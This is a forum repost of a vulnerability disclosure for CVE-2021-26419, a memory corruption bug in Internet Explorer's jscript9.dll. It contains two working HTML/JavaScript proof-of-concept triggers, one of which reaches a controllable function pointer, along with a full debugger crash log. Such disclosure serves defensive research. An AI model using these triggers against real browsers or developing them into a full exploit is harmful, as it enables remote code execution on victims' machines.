Kev Posted May 14, 2021 Report Posted May 14, 2021 There is a vulnerability in jscript9 that could be potentially used by an attacker to execute arbitrary code when viewing an attacker-controlled website in Internet Explorer. The vulnerability has been confirmed on Windows 10 64-bit with the latest security patches applied. Internet Explorer: Memory corruption in jscript9.dll related to scope of the arguments object There is a vulnerability in jscript9 that could be potentially used by an attacker to execute arbitrary code when viewing attacker-controlled website in Internet Explorer. The vulnerability has been confirmed on Windows 10 64-bit with the latest security patches applied. The following minimal sample is sufficient to trigger the bug: ############################################################ <!-- saved from url=(0014)about:internet --> <script> function main() { function v4(v5,v6) { with ({}) { arguments(); } } for(var i=0; i <1; i++) v4(1); } alert('start'); main(); alert('end'); </script> ############################################################ When this sample is opened with Internet Explorer, it crashes inside jscript9!Js::JavascriptFunction::CallFunction<1> when dereferencing memory pointed to by eax. jscript9!Js::JavascriptFunction::CallFunction<1>+0x39: 68c2d6e9 8bb850020000 mov edi,dword ptr [eax+250h] ds:002b:00000250=???????? On the first glance, it might look like a null pointer dereference, however the value of eax in this case was read from uninitialized memory. There are also different ways to trigger the crash when accessing the arguments object. The following sample demonstrates a crash when reading from a controllable address: ############################################################ <!-- saved from url=(0014)about:internet --> <script> function test() { test.caller.arguments.length = (0x13371337>>1); } function main() { function v4(v5,v6) { test(); with ({}) { arguments.length; arguments(); } } for(var i=0; i <1; i++) v4(1); } alert('start'); main(); alert('end'); </script> ############################################################ This sample crashes in Js::JavascriptOperators::GetProperty_Internal when dereferencing address 0x13371337+40h: jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35: 68b578b5 8b7840 mov edi,dword ptr [eax+40h] ds:002b:13371377=???????? The value read this way is used as a function pointer, thus demonstrating the vulnerability could be used for code execution. I haven't done the full root cause analysis (it will be easier to do with proper debug tooling for jscript9), but in both cases, the operations on 'arguments' object end up being performed on incorrect data. I suspect this is related to changing the scope, e.g. accessing an object at an incorrect stack slot due to scope change. Another possibility could be an incorrectly initialized arguments object or the corresponding local variable. Full debug log: ############################################################ (1654.14e8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=13371337 ebx=0910bbe0 ecx=0910bbe0 edx=0910bbe0 esi=092b8240 edi=00000000 eip=68b578b5 esp=053bc578 ebp=053bc590 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35: 68b578b5 8b7840 mov edi,dword ptr [eax+40h] ds:002b:13371377=???????? 0:009> k # ChildEBP RetAddr 00 053bc590 68b69075 jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35 01 053bc5dc 68b9d19d jscript9!Js::InterpreterStackFrame::OP_ProfiledLdLen<Js::OpLayoutReg2_OneByte>+0x1f5 02 053bc608 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x7fd 03 053bc744 0b9a0fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242 WARNING: Frame IP not in any known module. Following frames may be wrong. 04 053bc750 68c2d743 0xb9a0fd9 05 053bc798 68b9ff61 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93 06 053bc7c8 68b9cb53 jscript9!Js::InterpreterStackFrame::OP_ProfiledCallI<Js::OpLayoutCallI_OneByte>+0x121 07 053bc7f8 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x1b3 08 053bc934 0b9a0fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242 09 053bc940 68c2d743 0xb9a0fe1 0a 053bc988 68b9ff61 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93 0b 053bc9b8 68b9cb53 jscript9!Js::InterpreterStackFrame::OP_ProfiledCallI<Js::OpLayoutCallI_OneByte>+0x121 0c 053bc9e8 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x1b3 0d 053bcb14 0b9a0fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242 0e 053bcb20 68c2d743 0xb9a0fe9 0f 053bcb60 68b4eca9 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93 10 053bcbd4 68b4ebbc jscript9!Js::JavascriptFunction::CallRootFunctionInternal+0xb5 11 053bcc2c 68b4eb56 jscript9!Js::JavascriptFunction::CallRootFunction+0x4d 12 053bcc74 68b4eabd jscript9!ScriptSite::CallRootFunction+0x42 13 053bccb0 68b5256e jscript9!ScriptSite::Execute+0xae 14 053bcd48 68b4e9aa jscript9!ScriptEngine::ExecutePendingScripts+0x1bf 15 053bcde0 68c27cca jscript9!ScriptEngine::ParseScriptTextCore+0x32c 16 053bce30 695a9cc1 jscript9!ScriptEngine::ParseScriptText+0x5a 17 053bce68 694a0493 MSHTML!InitializeLocalHtmlEngine+0x1f11 18 053bcec0 694b7fe7 MSHTML!GetWebPlatformObject+0x16c93 19 053bcf30 694b8493 MSHTML!GetWebPlatformObject+0x2e7e7 1a 053bd01c 694b87be MSHTML!GetWebPlatformObject+0x2ec93 1b 053bd098 694b8146 MSHTML!GetWebPlatformObject+0x2efbe 1c 053bd0b8 694d79d9 MSHTML!GetWebPlatformObject+0x2e946 1d 053bd110 694d6bb9 MSHTML!UninitializeLocalHtmlEngine+0x8b49 1e 053bd134 694d653e MSHTML!UninitializeLocalHtmlEngine+0x7d29 1f 053bd25c 695d4891 MSHTML!UninitializeLocalHtmlEngine+0x76ae 20 053bd27c 695d47fb MSHTML!DllGetClassObject+0x7291 21 053bd29c 695d478d MSHTML!DllGetClassObject+0x71fb 22 053bd2e8 695d46a7 MSHTML!DllGetClassObject+0x718d 23 053bd300 6950dccc MSHTML!DllGetClassObject+0x70a7 24 053bd378 6967d357 MSHTML!TravelLogCreateInstance+0x25cec 25 053bd3c8 69510f32 MSHTML!DllCanUnloadNow+0x13957 26 053bd3e4 76d0ef5b MSHTML!TravelLogCreateInstance+0x28f52 27 053bd410 76d05eca USER32!_InternalCallWinProc+0x2b 28 053bd4f4 76d03c3a USER32!UserCallWinProcCheckWow+0x33a 29 053bd568 76d03a00 USER32!DispatchMessageWorker+0x22a 2a 053bd574 6ad32cd4 USER32!DispatchMessageW+0x10 2b 053bf720 6ad31db3 IEFRAME!Ordinal245+0x1cb4 2c 053bf7e0 6a5bcb2c IEFRAME!Ordinal245+0xd93 2d 053bf7f8 731e26ed msIso+0x1cb2c 2e 053bf830 756cfa29 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d 2f 053bf840 770676b4 KERNEL32!BaseThreadInitThunk+0x19 30 053bf89c 77067684 ntdll!RtlGetAppContainerNamedObjectPath+0xe4 31 053bf8ac 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xb4 ############################################################ This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2021-05-13. Disclosure at an earlier date is possible if agreed upon by all parties. Related CVE Numbers: CVE-2021-26419. Found by: ifratric@google.com Source 1 Quote